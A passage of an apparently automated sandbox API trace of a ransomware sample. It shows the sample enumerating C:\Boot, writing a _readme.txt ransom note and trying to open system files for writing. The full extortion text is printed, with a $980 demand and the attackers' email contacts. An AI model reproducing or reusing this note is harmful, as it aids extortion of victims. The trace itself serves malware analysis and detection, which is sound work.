Flags=0x0, Size=0x20) returned 0x31ed738 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.944] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.944] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.944] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.944] PathFindFileNameW (pszPath="") returned="" [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.945] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.945] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.945] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.946] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.946] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0227.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.946] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0227.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.946] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.946] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.946] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.947] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.947] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.947] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.947] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0227.947] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.947] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.947] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.947] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.948] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 